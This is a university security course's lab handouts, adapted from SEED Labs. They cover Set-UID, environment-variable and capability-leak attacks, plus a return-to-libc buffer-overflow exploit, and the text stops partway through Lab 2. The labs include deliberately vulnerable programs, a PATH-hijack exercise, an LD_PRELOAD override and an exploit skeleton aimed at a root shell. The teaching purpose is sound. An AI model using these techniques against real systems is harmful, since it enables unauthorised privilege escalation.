UIC CS487: Secure Computer Systems

This site collects the lab assignments for CS487 — Secure Computer Systems at the University of Illinois Chicago. Each lab is a hands-on exercise: you will build, break, and then defend real systems software.

The labs in this course are adapted from the SEED Labs project by Prof. Wenliang Du (Syracuse University), with UIC-specific setup, scoping, and submission requirements added. See Attribution and License for the details.

How to use this site

  • Read the whole lab before starting. Each lab has multiple tasks, and later tasks often depend on files or observations from earlier ones.
  • Work inside the course VM. Every lab is tested on the SEED Ubuntu 20.04 VM. Your local Ubuntu VM should also be fine. However, results on macOS or WSL may differ in ways that make the attacks fail. You may want to ask the instructor for a department VM.
  • Write things down as you go. Every task asks you to describe your observation. The report is where most of the credit lives — see Submitting a Lab Report.

Lab schedule

LabTopicReleasedDue
Lab 1Environment Variables and Set-UID Programs09/0109/11
Lab 2Return-to-libc Attack09/1509/25
Lab 3Format String Attack09/2910/09

A note on ethics

The techniques in these labs are real attack techniques. Use them only inside your own VM, or against systems you have explicit written permission to test. Running these against university infrastructure, or anyone else’s machine, is a violation of the UIC Student Disciplinary Policy and, quite likely, of state and federal law.

Lab Environment

All CS487 labs are developed and graded on the SEED Ubuntu 20.04 VM. Using the same image as the graders removes an entire class of “it worked on my machine” problems: several labs depend on the exact shell that /bin/sh points to, on specific glibc behavior, and on kernel hardening settings that differ across distributions.

Getting the VM

  1. Download the pre-built SEED Ubuntu 20.04 image from the SEED website: https://seedsecuritylabs.org/labsetup.html
  2. Install a hypervisor:
    • Intel/AMD machines: VirtualBox (free) or VMware Workstation/Fusion.
    • Apple Silicon Macs: VirtualBox does not run the x86 image well. Use UTM or VMware Fusion with an ARM Ubuntu 20.04 image, or use the cloud option below.
  3. Follow SEED’s VM setup manual for your hypervisor (linked from the same page).

The default account is seed with password dees.

Other option

If your laptop cannot run the image, contact the instructor on Piazza to get a department Ubuntu VM.

Sanity check

Before you start Lab 1, confirm your VM behaves as expected:

$ lsb_release -d
Description:	Ubuntu 20.04.x LTS

$ ls -l /bin/sh
lrwxrwxrwx 1 root root 4 ... /bin/sh -> dash

$ which gcc zsh
/usr/bin/gcc
/usr/bin/zsh

$ id
uid=1000(seed) gid=1000(seed) groups=1000(seed),...

If zsh is missing, install it — Lab 1 needs it:

sudo apt-get update && sudo apt-get install -y zsh

Working habits that will save you time

  • Snapshot your VM before each lab. Several labs ask you to relink /bin/sh, create root-owned Set-UID binaries, or modify files under /etc. A snapshot turns “I broke my VM” into a two-minute rollback.

  • Undo global changes when the lab is done. In particular, if a lab has you point /bin/sh at zsh, put it back:

    sudo ln -sf /bin/dash /bin/sh
    
  • Take screenshots as you go, not at the end. Reproducing a transient observation for the report is far more painful than capturing it the first time.

  • Keep a scratch directory per lab, e.g. ~/cs487/lab1/, and keep every source file you write. You will be asked to include code in the report.

Lab 1: Environment Variables and Set-UID Programs

Adapted from the SEED Labs Environment Variable and Set-UID Program Lab (Ubuntu 20.04 edition) by Wenliang Du. See Attribution and License.

EnvironmentSEED Ubuntu 20.04 VM (setup) or your own Ubuntu VM
Fileslab1.tar.gz — the SEED Labsetup sources, repackaged for this course
SubmissionOne PDF, structured as described in Submitting a Lab Report

Overview

Environment variables are a set of dynamic named values that can affect the way running processes behave on a computer. They have been part of Unix since 1979 and are used by essentially every operating system since. Although environment variables affect program behavior, how they achieve that is not well understood by many programmers — and a program that uses environment variables without understanding how they get there is often a vulnerable program.

In this lab you will study how environment variables work, how they propagate from a parent process to its children, and how they affect system and program behavior. The focus is on their effect on Set-UID programs, which are privileged, and therefore sit exactly on the boundary where attacker-controlled input meets elevated privilege.

Topics covered:

  • Environment variables
  • Set-UID programs
  • Securely invoking external programs
  • Capability leaking
  • The dynamic loader/linker

Background reading

  • man 7 environ, man 3 system, man 2 execve, man 2 setuid, man 8 ld.so

Before you begin

Snapshot your VM. Tasks 6 and 7 have you relink /bin/sh and create root-owned Set-UID binaries; a snapshot makes cleanup trivial.

Download the lab source files and unpack them inside the VM:

mkdir -p ~/cs487/lab1 && cd ~/cs487/lab1
wget https://xjtuwxg.github.io/computer-security-labs/labs/files/lab1.tar.gz
tar xzf lab1.tar.gz
cd Labsetup && ls

You should see myprintenv.c, myenv.c, catall.c, and cap_leak.c — the starter files referenced by Tasks 2, 3, 8, and 9. The remaining programs in this lab you write yourself.


Task 1: Manipulating Environment Variables

In this task we look at the commands that set and unset environment variables. We are using Bash in the seed account. The default shell a user gets is set in the last field of that user’s entry in /etc/passwd; you could change it with chsh, but do not do that in this lab.

Do the following:

  • Use printenv or env to print out the environment variables. To look at one variable, use printenv PWD or env | grep PWD.
  • Use export and unset to set and unset environment variables. Note that these two are not separate programs — they are Bash built-ins, and you will not find them as executables anywhere on the filesystem.
$ printenv | head
$ printenv PWD
$ export CS487_LAB=1
$ printenv CS487_LAB
$ unset CS487_LAB
$ printenv CS487_LAB          # what happens now?
$ which export                # and why does this fail?

Deliverable. Show the transcript above. Explain why which export finds nothing even though export clearly works, and what that tells you about where the environment actually lives.


Task 2: Passing Environment Variables from Parent Process to Child Process

In Unix, fork() creates a new process by duplicating the calling process. The new process (the child) is an exact duplicate of the parent — but several things are not inherited by the child (see man fork). In this task we determine whether the parent’s environment variables are among the things that are inherited.

Step 1

Compile and run the following program and describe your observation. It is in the Labsetup folder; compile it with gcc myprintenv.c, which produces a.out. Run it and save the output to a file with a.out > file.

// myprintenv.c
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>

extern char **environ;

void printenv()
{
  int i = 0;
  while (environ[i] != NULL) {
    printf("%s\n", environ[i]);
    i++;
  }
}

void main()
{
  pid_t childPid;
  switch(childPid = fork()) {
    case 0:  /* child process */
      printenv();          /* (1) */
      exit(0);
    default: /* parent process */
      //printenv();        /* (2) */
      exit(0);
  }
}

Step 2

Now comment out the printenv() call in the child case (line ①) and uncomment the one in the parent case (line ②). Compile and run again, and save the output to a different file. Describe your observation.

Step 3

Compare the two files with diff, and draw your conclusion.

$ gcc myprintenv.c -o printenv_child && ./printenv_child > child.txt
# ... edit the file to swap which printenv() is active ...
$ gcc myprintenv.c -o printenv_parent && ./printenv_parent > parent.txt
$ diff child.txt parent.txt

Deliverable. The diff output (or a statement that it is empty) plus your conclusion about whether fork() propagates the environment. State where the child’s environment came from — the kernel, the C library, or the parent’s memory.

Understanding check. fork() gives the child a copy of the parent’s memory. Is the child’s environ the same memory as the parent’s, or a copy? What happens in the parent if the child calls setenv()?


Task 3: Environment Variables and execve()

execve() loads a new program and executes it; it never returns. No new process is created — instead the calling process’s text, data, bss, and stack are overwritten by the program being loaded. Essentially, execve() runs the new program inside the calling process. What happens to the environment variables?

Step 1

Compile and run the following program, which simply executes /usr/bin/env — a program that prints the environment variables of the current process.

// myenv.c
#include <unistd.h>

extern char **environ;

int main()
{
  char *argv[2];

  argv[0] = "/usr/bin/env";
  argv[1] = NULL;
  execve("/usr/bin/env", argv, NULL);    /* (1) */

  return 0;
}

Step 2

Change the execve() invocation on line ① to the following, and describe your observation:

execve("/usr/bin/env", argv, environ);

Step 3

Draw your conclusion about how the new program gets its environment variables.

Deliverable. Both outputs, and a one-paragraph statement of the rule: who decides the environment of an execve()’d program?

Understanding check. In Task 2 the environment survived automatically; here you had to pass it explicitly. Reconcile these two observations. Then explain why execvp() and friends appear to preserve the environment anyway (hint: man 3 exec, and look for environ).


Task 4: Environment Variables and system()

system() is used to execute a command, but unlike execve(), which executes the command directly, system() actually executes /bin/sh -c command — it runs a shell and asks the shell to run the command.

If you look at the implementation of system(), you will see that it uses execl() to execute /bin/sh; execl() calls execve(), passing to it the environment variable array environ. Therefore, when you use system(), the calling process’s environment variables are passed to the new program /bin/sh. Compile and run the following program to verify this:

#include <stdio.h>
#include <stdlib.h>

int main()
{
  system("/usr/bin/env");
  return 0;
}

Deliverable. Show that a variable you export in your shell appears in the output. Then explain the chain of custody: your shell → your program → /bin/sh → env. At which step could an attacker influence what env sees?


Task 5: Environment Variable and Set-UID Programs

Set-UID is an important security mechanism in Unix. When a Set-UID program runs, it assumes the owner’s privileges. If the program’s owner is root, then anyone who runs this program gains root’s privileges for the duration of its execution. This allows a program to do many useful things, but because it escalates privilege, it is risky.

The behavior of a Set-UID program is decided by its program logic, not by the user — but users can nonetheless influence that behavior through environment variables. To understand how, we first determine whether environment variables are inherited by a Set-UID program’s process from the user’s process.

Step 1

Write a program that prints out all the environment variables in the current process:

#include <stdio.h>
#include <stdlib.h>

extern char **environ;

int main()
{
  int i = 0;
  while (environ[i] != NULL) {
    printf("%s\n", environ[i]);
    i++;
  }
}

Step 2

Compile the program, change its ownership to root, and make it a Set-UID program.

# Assume the program's name is foo
$ gcc foo.c -o foo
$ sudo chown root foo
$ sudo chmod 4755 foo
$ ls -l foo          # confirm the 's' bit

Step 3

In your shell (you need to be in a normal user account, not root), use export to set the following environment variables — they may already exist:

  • PATH
  • LD_LIBRARY_PATH
  • ANY_NAME (a variable you invent; pick whatever name you want)
$ export PATH=/home/seed/cs487:$PATH
$ export LD_LIBRARY_PATH=/home/seed/cs487
$ export CS487_CANARY=hello
$ ./foo | grep -E 'PATH|LD_LIBRARY_PATH|CS487_CANARY'

These environment variables are set in the user’s shell process. Now run the Set-UID program from Step 2 in your shell. After you type the name of the program, the shell forks a child process and uses the child process to run the program. Check whether all the environment variables you set in the shell process (parent) get into the Set-UID child process. Describe your observation. If there are surprises, describe them.

Deliverable. For each of the three variables, state whether it survived into the privileged process. At least one of them will behave differently from the others — identify which, and explain the mechanism responsible (the dynamic linker, not the kernel or the shell).


Task 6: The PATH Environment Variable and Set-UID Programs

Because of the shell program invoked, calling system() inside a Set-UID program is quite dangerous. The behavior of the shell can be affected by environment variables such as PATH, which is provided by the user, who may be malicious. By changing these variables, a malicious user can control the behavior of a Set-UID program.

In Bash you can prepend a directory to PATH like this:

$ export PATH=/home/seed:$PATH

The Set-UID program below is supposed to execute the /bin/ls command; however, the programmer used only the relative path for ls, rather than the absolute path:

int main()
{
  system("ls");
  return 0;
}

Compile the above program, change its owner to root, and make it a Set-UID program. Can you get this Set-UID program to run your own malicious code instead of /bin/ls? If you can, is your malicious code running with root privilege? Describe and explain your observations.

The /bin/sh countermeasure

Note. system(cmd) executes the /bin/sh program first, and then asks that shell to run cmd. In Ubuntu 20.04 (and several versions before it), /bin/sh is a symbolic link pointing to /bin/dash. dash has a countermeasure that prevents itself from being executed in a Set-UID process: if dash detects it is running in a Set-UID process, it immediately changes the effective user ID to the process’s real user ID, essentially dropping the privilege.

Since our victim program is a Set-UID program, the countermeasure in /bin/dash will prevent our attack. To see how the attack works without such a countermeasure, link /bin/sh to another shell that does not have it. The SEED VM ships with zsh:

$ sudo ln -sf /bin/zsh /bin/sh

Run the attack again with zsh in place, and compare. When you are done with this task, put /bin/sh back:

$ sudo ln -sf /bin/dash /bin/sh

Deliverable. Show the attack under both shells. Report the output of id (or whoami) from inside your injected code in each case, and explain precisely what dash does differently. State whether the dash countermeasure fixes the vulnerability or merely blocks this exploit.

Understanding check. The dash countermeasure drops privilege. Name a Set-UID program for which that would be an unacceptable fix, and describe what the program should do instead.


Task 7: The LD_PRELOAD Environment Variable and Set-UID Programs

Several environment variables — LD_PRELOAD, LD_LIBRARY_PATH, and other LD_* variables — influence the behavior of the dynamic loader/linker, the part of the OS that loads shared libraries from disk and links them into an executable at run time.

In Linux, ld.so and ld-linux.so are the dynamic loader/linker. LD_LIBRARY_PATH is a colon-separated set of directories to search for libraries before the standard set of directories. LD_PRELOAD specifies a list of additional, user-specified shared libraries to be loaded before all others. In this task we study LD_PRELOAD.

Step 1

First, see how these variables influence the dynamic linker when running a normal program.

  1. Build a dynamic link library. Create the following program and name it mylib.c. It overrides the sleep() function in libc:

    #include <stdio.h>
    void sleep(int s)
    {
      /* If this is invoked by a privileged program,
         you can do damages here!  */
      printf("I am not sleeping!\n");
    }
    
  2. Compile it (in the -lc argument, the second character is a lowercase L):

    $ gcc -fPIC -g -c mylib.c
    $ gcc -shared -o libmylib.so.1.0.1 mylib.o -lc
    
  3. Set the LD_PRELOAD environment variable:

    $ export LD_PRELOAD=./libmylib.so.1.0.1
    
  4. Compile the following program myprog, in the same directory as the library:

    /* myprog.c */
    #include <unistd.h>
    int main()
    {
      sleep(1);
      return 0;
    }
    

Step 2

Run myprog under each of the following conditions, and observe what happens:

  1. Make myprog a regular program, and run it as a normal user.
  2. Make myprog a Set-UID root program, and run it as a normal user.
  3. Make myprog a Set-UID root program, export LD_PRELOAD again in the root account, and run it.
  4. Make myprog a Set-UID user1 program (i.e. the owner is user1, a different user account), export LD_PRELOAD again in a different user’s account (not root), and run it.

Creating the extra account for case 4:

$ sudo adduser user1
$ sudo chown user1 myprog && sudo chmod 4755 myprog

Step 3

You should observe different behaviors in the four scenarios above, even though you are running the same program. Figure out what causes the difference. Environment variables play a role here. Design an experiment to figure out the main causes, and explain why the behaviors in Step 2 are different.

Hint. The child process may not inherit the LD_* environment variables.

Deliverable. A four-row table: scenario, real UID, effective UID, whether the override took effect. Then state the dynamic linker’s rule in one sentence, and explain why case 3 differs from case 2 even though both run a Set-UID root binary.


Task 8: Invoking External Programs Using system() versus execve()

Although system() and execve() can both be used to run new programs, system() is quite dangerous if used in a privileged program such as a Set-UID program. We have already seen how PATH affects the behavior of system(), because the variable affects how the shell works. execve() does not have that problem, because it does not invoke a shell. Invoking a shell has another dangerous consequence, and this time it has nothing to do with environment variables.

The scenario

Bob works for an auditing agency and needs to investigate a company for a suspected fraud. For the investigation, Bob needs to be able to read all the files in the company’s Unix system; on the other hand, to protect the integrity of the system, Bob should not be able to modify any file.

To achieve this, Vince, the superuser, wrote a special set-root-uid program (below) and gave the executable permission to Bob. The program requires Bob to type a file name on the command line, and then it runs /bin/cat to display the specified file. Since the program runs as root, it can display any file Bob specifies. However, since the program has no write operations, Vince is very sure that Bob cannot use this special program to modify any file.

// catall.c
int main(int argc, char *argv[])
{
  char *v[3];
  char *command;

  if (argc < 2) {
    printf("Please type a file name.\n");
    return 1;
  }

  v[0] = "/bin/cat"; v[1] = argv[1]; v[2] = NULL;
  command = malloc(strlen(v[0]) + strlen(v[1]) + 2);
  sprintf(command, "%s %s", v[0], v[1]);

  // Use only one of the followings.
  system(command);
  // execve(v[0], v, NULL);

  return 0;
}

Step 1

Compile the above program, make it a root-owned Set-UID program. The program will use system() to invoke the command. If you were Bob, can you compromise the integrity of the system? For example, can you remove a file that is not writable to you?

$ gcc catall.c -o catall
$ sudo chown root catall && sudo chmod 4755 catall
$ touch /tmp/victim && sudo chown root /tmp/victim && sudo chmod 644 /tmp/victim
$ ./catall /tmp/victim          # the intended use
$ ./catall "???"                # your attack goes here

Step 2

Comment out the system(command) statement and uncomment the execve() statement; the program will now use execve() to invoke the command. Compile the program and make it a root-owned Set-UID program. Do your attacks in Step 1 still work? Describe and explain your observations.

Deliverable. The exact argument you passed to defeat the system() version, proof that the unwritable file was modified or removed, and the result of the same argument against the execve() version. Explain the difference in terms of who parses the string.

Understanding check. The bug here is not system() itself; it is that a string intended as data (a filename) is handed to something that treats it as code (a shell command line). Name two other places in systems programming where the same confusion occurs.


Task 9: Capability Leaking

To follow the Principle of Least Privilege, Set-UID programs often permanently relinquish their root privileges when those privileges are no longer needed. Sometimes the program also needs to hand its control over to the user; in that case root privileges must be revoked. The setuid() system call can be used to revoke privileges. According to the manual: “setuid() sets the effective user ID of the calling process. If the effective UID of the caller is root, the real UID and saved set-user-ID are also set.” Therefore, if a Set-UID program with effective UID 0 calls setuid(n), the process becomes a normal process, with all its UIDs set to n.

When revoking privilege, one of the common mistakes is capability leaking. The process may have gained some privileged capabilities while it was still privileged; when the privilege is downgraded, if the program does not clean up those capabilities, they may still be accessible by the now-unprivileged process. In other words, although the effective user ID of the process is no longer privileged, the process is still privileged because it possesses privileged capabilities.

Compile the following program, change its owner to root, and make it a Set-UID program. Run the program as a normal user. Can you exploit the capability leaking vulnerability in this program? The goal is to write to the /etc/zzz file as a normal user.

// cap_leak.c
void main()
{
  int fd;
  char *v[2];

  /* Assume that /etc/zzz is an important system file,
   * and it is owned by root with permission 0644.
   * Before running this program, you should create
   * the file /etc/zzz first. */
  fd = open("/etc/zzz", O_RDWR | O_APPEND);
  if (fd == -1) {
    printf("Cannot open /etc/zzz\n");
    exit(0);
  }

  // Print out the file descriptor value
  printf("fd is %d\n", fd);

  // Permanently disable the privilege by making the
  // effective uid the same as the real uid
  setuid(getuid());

  // Execute /bin/sh
  v[0] = "/bin/sh"; v[1] = 0;
  execve(v[0], v, 0);
}

Set up the target file first:

$ sudo touch /etc/zzz
$ sudo chmod 644 /etc/zzz
$ ls -l /etc/zzz

Deliverable. The commands you ran inside the spawned shell, the resulting contents of /etc/zzz, and ls -l /etc/zzz showing that you — an unprivileged user — did not own it and could not have written to it directly. Explain why the leaked descriptor still works after setuid(getuid()).

Understanding check. Two fixes are possible: close the descriptor before revoking privilege, or set the close-on-exec flag. Which one defends against more cases, and why? (See man fcntl, FD_CLOEXEC.)


Cleaning up

Undo the global changes this lab made to your VM:

$ sudo ln -sf /bin/dash /bin/sh     # if you relinked it in Task 6
$ sudo rm -f /etc/zzz               # if you created it in Task 9
$ unset LD_PRELOAD LD_LIBRARY_PATH  # Tasks 5 and 7
$ ls -l /bin/sh                     # confirm it points at dash again

Leaving a root-owned Set-UID binary lying around in your home directory is itself a vulnerability. Delete the ones you created, or restore your pre-lab snapshot.

Submission

Submit a single PDF containing, for each of the nine tasks: the commands you ran, a screenshot or transcript of what you observed, and an explanation of why that happened. List the important code snippets followed by explanation — simply attaching code without any explanation will not receive credit.

See Submitting a Lab Report for the expected structure.

Lab 2: Return-to-libc Attack

Adapted from the SEED Labs Return-to-libc Attack Lab (Ubuntu 20.04 edition) by Wenliang Du. See Attribution and License.

EnvironmentSEED Ubuntu 20.04 VM (setup) or your own Ubuntu VM — this lab is x86 (32-bit) and needs the multilib toolchain
Fileslab2.tar.gz — the SEED Labsetup sources (retlib.c, exploit.py, Makefile), repackaged for this course
SubmissionOne PDF, structured as described in Submitting a Lab Report

Overview

The classic way to exploit a buffer overflow is to inject a shellcode into the program’s stack and then overwrite a return address so that control jumps into that shellcode. To stop this, modern systems mark the stack non-executable: the CPU refuses to run instructions that live on the stack, so the injected shellcode never executes.

This defense is not fool-proof. In a return-to-libc attack you never execute your own code at all — instead you redirect the vulnerable program into code that is already in its address space and already executable: the C library (libc), which every program links against. If you can make the return address point at system() and arrange for its argument to be the string "/bin/sh", the program politely spawns a shell for you, entirely with legitimate, executable library code. The non-executable stack never enters the picture.

In this lab you are given a root-owned Set-UID program with a buffer-overflow vulnerability. Your task is to build a return-to-libc attack that bypasses the non-executable stack and gives you a root shell. You will then defeat the /bin/dash privilege-dropping countermeasure, and finally get a taste of Return-Oriented Programming (ROP) by chaining several returns together.

Topics covered:

  • Buffer-overflow vulnerabilities
  • Stack layout during a function call, and the non-executable stack
  • The return-to-libc technique
  • Chaining calls; an introduction to Return-Oriented Programming (ROP)

Background reading

  • Chapter 5 of Computer & Internet Security: A Hands-on Approach, 2nd edition, by Wenliang Du
  • man 3 system, man 3 exec, man 3 getenv, man 1 gdb
  • The Appendix: understanding the function-call mechanism at the end of this lab — read it before Task 3 if you are shaky on stack frames.

A note on architecture (read this first)

Return-to-libc on a 64-bit (x64) program is considerably harder than on a 32-bit (x86) program, so — like the SEED lab — we stay in 32-bit for the whole lab. Every gcc command uses the -m32 flag, which produces a 32-bit binary. This has two consequences:

  • You need the 32-bit toolchain and libraries by executing sudo apt install gcc gcc-multilib. The SEED Ubuntu 20.04 VM already has them.
  • The attack depends on running actual x86 code. On an Apple Silicon Mac an ARM VM cannot execute the 32-bit x86 binaries this lab produces, contact the instructor on Piazza with your SSH public key and NetID for a department VM. Do not attempt this lab on an ARM VM.

Before you begin

Snapshot your VM. This lab relinks /bin/sh, disables kernel address randomization, and creates a root-owned Set-UID binary. A snapshot makes cleanup a two-minute rollback.

Download the lab source files and unpack them inside the VM:

mkdir -p ~/cs487/lab2 && cd ~/cs487/lab2
wget https://xjtuwxg.github.io/computer-security-labs/labs/files/lab2.tar.gz
tar xzf lab2.tar.gz
cd Labsetup && ls

You should see retlib.c (the vulnerable program), exploit.py (a skeleton you fill in for Task 3), and Makefile (which compiles and installs the Set-UID binary with the right flags).


Setting up the environment

Ubuntu ships several defenses that make buffer-overflow attacks hard. To study the attack we first switch them off, one at a time. Understand what each one does — several of the deliverables ask you to reason about them.

1. Address Space Layout Randomization (ASLR)

ASLR randomizes the starting address of the stack, the heap, and shared libraries on every run, so you cannot guess where system() or your shell string lives. Turn it off for the whole VM:

$ sudo sysctl -w kernel.randomize_va_space=0

With this set to 0, the same binary loads libc at the same address every run, which is what makes Task 1’s gdb lookup meaningful.

2. StackGuard

gcc can insert a stack canary — a guard value placed between the local buffer and the saved return address. If a strcpy() overflow clobbers the return address, it clobbers the canary too, and the program aborts before returning. Disable it at compile time with -fno-stack-protector (already in the Makefile).

3. Non-executable stack

This is the very defense the attack is designed to bypass, so we keep it on. A program’s header declares whether it needs an executable stack; compiling with -z noexecstack marks the stack non-executable. The Makefile uses this flag on purpose — your exploit must work despite it.

4. The /bin/dash countermeasure

system() does not run your command directly; it runs /bin/sh -c <command>. In Ubuntu 20.04, /bin/sh is a symlink to /bin/dash, and dash drops privilege when it detects it is running in a Set-UID process — which would defeat our attack before it even starts. For Tasks 1–3 we sidestep this by pointing /bin/sh at zsh, which has no such countermeasure:

$ sudo ln -sf /bin/zsh /bin/sh

We will put /bin/sh back to dash and defeat the countermeasure properly in Task 4.

The vulnerable program

Here is retlib.c. It reads up to 1000 bytes from a file called badfile and hands them to bof(), which copies them into a much smaller buffer with strcpy() — the overflow. The program prints the addresses of buffer[] and the frame pointer to make your life easier. It is a root-owned Set-UID program, so a successful overflow yields a root shell.

// retlib.c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

#ifndef BUF_SIZE
#define BUF_SIZE 12
#endif

int bof(char *str)
{
    char buffer[BUF_SIZE];
    unsigned int *framep;

    // Copy ebp into framep
    asm("movl %%ebp, %0" : "=r" (framep));

    /* print out information for experiment purpose */
    printf("Address of buffer[] inside bof():  0x%.8x\n", (unsigned)buffer);
    printf("Frame Pointer value inside bof():  0x%.8x\n", (unsigned)framep);

    strcpy(buffer, str);   //  <-- buffer overflow!

    return 1;
}

// This function is used only in the optional Task 5.
void foo(){
    static int i = 1;
    printf("Function foo() is invoked %d times\n", i++);
    return;
}

int main(int argc, char **argv)
{
   char input[1000];
   FILE *badfile;

   badfile = fopen("badfile", "r");
   int length = fread(input, sizeof(char), 1000, badfile);
   printf("Address of input[] inside main():  0x%x\n", (unsigned int) input);
   printf("Input size: %d\n", length);

   bof(input);

   printf("(^_^)(^_^) Returned Properly (^_^)(^_^)\n");
   return 1;
}

Compile and install

Build the Set-UID binary with the provided Makefile. It compiles for 32-bit with the countermeasures configured as above, then changes the owner to root and sets the Set-UID bit. Ownership must be changed before the Set-UID bit is set — changing ownership clears the bit — and the Makefile already orders these correctly:

$ make

The Makefile runs, in effect:

$ gcc -m32 -DBUF_SIZE=N -fno-stack-protector -z noexecstack -o retlib retlib.c
$ sudo chown root retlib
$ sudo chmod 4755 retlib
$ ls -l retlib          # confirm the 's' bit and root ownership

N is the buffer size, defined by the N = line in the Makefile. Your instructor may give you a specific value of N to use (it can be anything from 10 to 800); changing it changes the stack layout, so use the value you are told and set it in the Makefile before building. Without -DBUF_SIZE, the default from the source is 12.

Why the instructor picks N. A different buffer size shifts every offset in your exploit, so a solution built for one N will not work for another. This is deliberate: it makes last year’s badfile — and the ones posted online — useless, and forces you to derive the offsets yourself.


Task 1: Finding the Addresses of libc Functions

Because ASLR is off, libc loads at the same address every time you run retlib, so you can read the addresses of system() and exit() straight out of the program under gdb. You need exit() as well as system() — Task 3 explains why.

Two things matter here:

  • Debug the Set-UID binary itself, not a private copy you recompiled. A Set-UID and a non-Set-UID build of the same program may load libc at different addresses, so an address taken from the wrong binary will be wrong.
  • You must run the program at least once inside gdb before printing the addresses. libc is loaded lazily by the dynamic linker; until the program actually starts, the symbols are not yet resolved to real addresses.
$ touch badfile          # retlib opens badfile on startup; create an empty one
$ gdb -q retlib
pwndbg> break main
Breakpoint 1 at 0x...
pwndbg> run
...
Breakpoint 1, 0x... in main ()
pwndbg> p system
$1 = {<text variable, no debug info>} 0xf7e12420 <system>
pwndbg> p exit
$2 = {<text variable, no debug info>} 0xf7e04f80 <exit>
pwndbg> quit

(The addresses above are examples; yours will differ.) If you prefer, script it in batch mode:

$ cat > gdb_command.txt <<'EOF'
break main
run
p system
p exit
quit
EOF
$ gdb -q -batch -x gdb_command.txt ./retlib

Deliverable. Report the addresses of system() and exit() you obtained. Explain why you must run the program once inside gdb before the addresses are valid, and why debugging the Set-UID binary (rather than a recompiled copy) matters.

Understanding check. With ASLR off you get the same system() address on every run. What specifically would change if you re-enabled it with sudo sysctl -w kernel.randomize_va_space=2, and why does that break the attack you are about to build?


Task 2: Putting the Shell String in Memory

To call system("/bin/sh") you need the string "/bin/sh" sitting somewhere in the process’s memory, and you need to know its address so you can pass it as the argument. There are several ways to arrange this; we use an environment variable, because the shell copies exported variables into the memory of every program it launches.

Define a variable holding the string and confirm it reaches the child process:

$ export MYSHELL=/bin/sh
$ env | grep MYSHELL
MYSHELL=/bin/sh

Now find where in memory that string lands. Compile this helper and run it in the same terminal:

// prtenv.c
#include <stdio.h>
#include <stdlib.h>

void main(){
   char* shell = getenv("MYSHELL");
   if (shell)
      printf("%x\n", (unsigned int)shell);
}
$ gcc -m32 -o prtenv prtenv.c
$ ./prtenv
ffffd...

With ASLR off, prtenv prints the same address every time. Because retlib sees the same environment, MYSHELL sits at (very nearly) the same place when retlib runs — but the address depends on the length of the program’s name. The environment block sits at the very top of the stack, just above argv, which includes the program’s path; a longer or shorter name pushes everything below it up or down. That is why the helper is named prtenv — 6 characters, exactly matching retlib — so the address it reports matches the one retlib will see.

Note. Compile prtenv with -m32. retlib is a 32-bit binary; if prtenv is 64-bit the stack is laid out differently and the address will not match.

Deliverable. The address of MYSHELL reported by prtenv, and evidence that it is stable across runs. Explain, in terms of where the environment block lives on the stack, why the length of the program name shifts this address — and why prtenv therefore had to have exactly the same name length as retlib.

Understanding check. The /bin/sh you point system() at is inside the MYSHELL=/bin/sh string, not at the start of it. If you passed the address of the M instead of the /, what would system() try to run, and what would happen?


Task 3: Launching the Attack

You now have the three ingredients: the address of system(), the address of exit() (Task 1), and the address of the "/bin/sh" string (Task 2). The remaining job is to lay them out in badfile so that when bof() returns, the CPU “returns” into system() with "/bin/sh" as its argument.

How the stack must look

When bof() executes its ret, the CPU pops whatever is at the top of the stack and jumps there — that slot is the saved return address. A return-to-libc payload replaces that slot with the address of system(), and then lays out, just above it, exactly what system() expects to find after a normal call:

      higher addresses
   +------------------------+
   |  address of "/bin/sh"  |  <- argument to system()
   +------------------------+
   |  address of exit()     |  <- "return address" system() sees
   +------------------------+
   |  address of system()   |  <- overwrites bof()'s saved return address
   +------------------------+   <- where %esp points when bof() does `ret`
   |  saved %ebp (clobbered)|
   +------------------------+
   |      buffer[...]        |  <- strcpy() copies your badfile to here
      lower addresses

When bof returns, execution jumps to system(). system() sees the slot above it as its return address (that is the calling convention), and the slot above that as its first argument. So you place exit() where system() will return, and the address of "/bin/sh" where system() reads its argument. When the shell you spawn exits, system() returns — into exit() — and the program terminates cleanly instead of crashing.

Fill in the exploit

exploit.py (provided) writes the three addresses into badfile at offsets X, Y, and Z. Your job is to supply the three addresses and the three offsets:

#!/usr/bin/env python3
import sys

# Fill content with non-zero values
content = bytearray(0xaa for i in range(300))

X = 0
sh_addr = 0x00000000       # The address of "/bin/sh"
content[X:X+4] = (sh_addr).to_bytes(4,byteorder='little')

Y = 0
system_addr = 0x00000000   # The address of system()
content[Y:Y+4] = (system_addr).to_bytes(4,byteorder='little')

Z = 0
exit_addr = 0x00000000     # The address of exit()
content[Z:Z+4] = (exit_addr).to_bytes(4,byteorder='little')

# Save content to a file
with open("badfile", "wb") as f:
  f.write(content)

The offset Y is the distance, in bytes, from the start of buffer[] to the saved return-address slot. Read it off from the two addresses retlib prints: the frame pointer points at the saved %ebp, and the return address is 4 bytes above that. Once you know Y, the picture above fixes the other two: Z = Y + 4 and X = Y + 8.

$ ./exploit.py         # build badfile
$ ./retlib             # trigger the overflow
...
# id                   # <-- root shell!
uid=0(root) ...

A note on gdb and %ebp. If you use gdb to pin down Y, be aware that in Ubuntu 20.04, when you break at bof, gdb stops before the prologue sets %ebp to bof’s frame — so printing $ebp there gives you the caller’s %ebp. Step forward with next a few instructions until the prologue has run, then read $ebp. (The SEED book’s 16.04 walkthrough omits this step.)

Deliverable. Your values of X, Y, and Z with the reasoning for each (show how you derived Y from the printed frame pointer, or, if you brute-forced it, show the trials). Include the working exploit.py and a screenshot of the resulting root shell with the output of id showing uid=0(root).

Attack variation 1: Is exit() really necessary?

Set exit_addr to a junk value (or omit it) and run the attack again. Report what happens when you exit the spawned shell, and explain why. Does the missing exit() stop you from getting the shell, or only affect what happens afterward?

Attack variation 2: Does the program’s name matter?

Rename retlib to something of a different length — for example newretlib — and rerun the attack *without changing badfile:

$ cp retlib newretlib      # keep the Set-UID copy; or re-make under the new name
$ ./newretlib

Report whether it still works. If it fails, explain why in terms of what you learned in Task 2.

Deliverable. For each variation: the change you made, what you observed, and the explanation. Variation 1 should discuss what system() returns into; variation 2 should connect back to the address of the environment string.

Understanding check. In this attack you never placed a single executable instruction on the stack, yet the stack is where your badfile was copied. Explain why the non-executable stack defense does nothing to stop you here.


Task 4 (Optional, 1 bonus point): Defeating the Shell’s Countermeasure

For Tasks 1-3 you pointed /bin/sh at zsh to sidestep the dash privilege drop. Now put it back to the real default and defeat the countermeasure properly:

